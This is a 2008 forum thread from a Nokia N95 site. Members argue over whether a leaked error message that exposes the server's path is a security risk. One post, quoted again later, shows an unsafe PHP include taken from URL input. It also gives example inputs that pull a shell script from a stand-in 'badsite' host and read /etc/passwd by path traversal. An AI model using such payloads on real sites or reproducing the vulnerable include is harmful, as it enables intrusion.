Nokia N95

Steven_Smith · #1 07-09-2008, 12:38 PM

Quote:

_COM_SEF_NOREAD <snip> )
_COM_SEF_CHK_PERMS

Found when going to Nokia N95 software, downloads, themes - Home

Micky · #2 07-09-2008, 01:47 PM

Yep, getting the same here. I guess Brandon will sort it soon.

admin · #3 07-09-2008, 04:17 PM

Thanks guys, fixed.

Rapid Dr3am · #4 07-09-2008, 09:11 PM

Yay full path disclosure ftw!

Steven_Smith · #5 07-09-2008, 09:27 PM

Yeah, but you can not access it without admin rights so doesn't really matter.

Leong · #6 07-10-2008, 09:09 AM

In the photo competition prize thread i was wonderign who was this "Generous Brandon". LOL It's so clear now!

Rapid Dr3am · #7 07-10-2008, 08:43 PM

You seriously need to figure out what is a security risk and what isn't!

I mean now that a *malicious* user knows the path to the web root they, can look at ways to exploit the application layer (weakest part). If they can get a decent LFI they can access etc/passwd from there.

Full Path Disclosure = Bad

EDIT:

Thought I should clarify this a bit more.

Say there was some code that was poorly written like this:

Code:

include($HTTP_GET_VARS['a']);

Now in that page you could pass something like page.php?a=http://www.badsite.com/shell.txt or you could do index.php?a=../../../etc/passwd, now look at how simply that was done.
If I didn't have the full path disclosure, I wouldn't know how many directories down I need to go. I wouldn't know if it was a Windows/*nix box. Well not quite the OS, most boxes will tell you if you ask. Like this box runs FreeBSD 6.2.

Steven_Smith · #8 07-11-2008, 12:44 AM

Quote:

Originally Posted by Rapid Dr3am

You seriously need to figure out what is a security risk and what isn't!

I mean now that a *malicious* user knows the path to the web root they, can look at ways to exploit the application layer (weakest part). If they can get a decent LFI they can access etc/passwd from there.

Full Path Disclosure = Bad

EDIT:

Thought I should clarify this a bit more.

Say there was some code that was poorly written like this:

Code:

include($HTTP_GET_VARS['a']);

Now in that page you could pass something like page.php?a=http://www.badsite.com/shell.txt or you could do index.php?a=../../../etc/passwd, now look at how simply that was done.
If I didn't have the full path disclosure, I wouldn't know how many directories down I need to go. I wouldn't know if it was a Windows/*nix box. Well not quite the OS, most boxes will tell you if you ask. Like this box runs FreeBSD 6.2.

God I would hate to be you! You must have so many enemies, why would anyone want to hack this forum? We don't hold any good information on our members, well nothing you can't already see.

Also most people have better things to do than find security holes in forums, for example the bloke who found the flaw in the DNS servers using cache poisoning, now that was something worth while.

Rapid Dr3am · #9 07-11-2008, 06:34 PM

Did I say someone wanted to hack the forum? Oh wait it's a small forum so the server wouldn't be any use? I doubt someone would use it for Phishing or DDoS attacks. Maybe even just for lulz?

Also it's fora not forums, in the English language when you take a word that end UM like Forum or Agendum the plural becomes A making Agenda or Fora.

Steven_Smith · #10 07-12-2008, 01:05 AM

No one is sad enough. And I am sure the forum is a lot more secure than you think.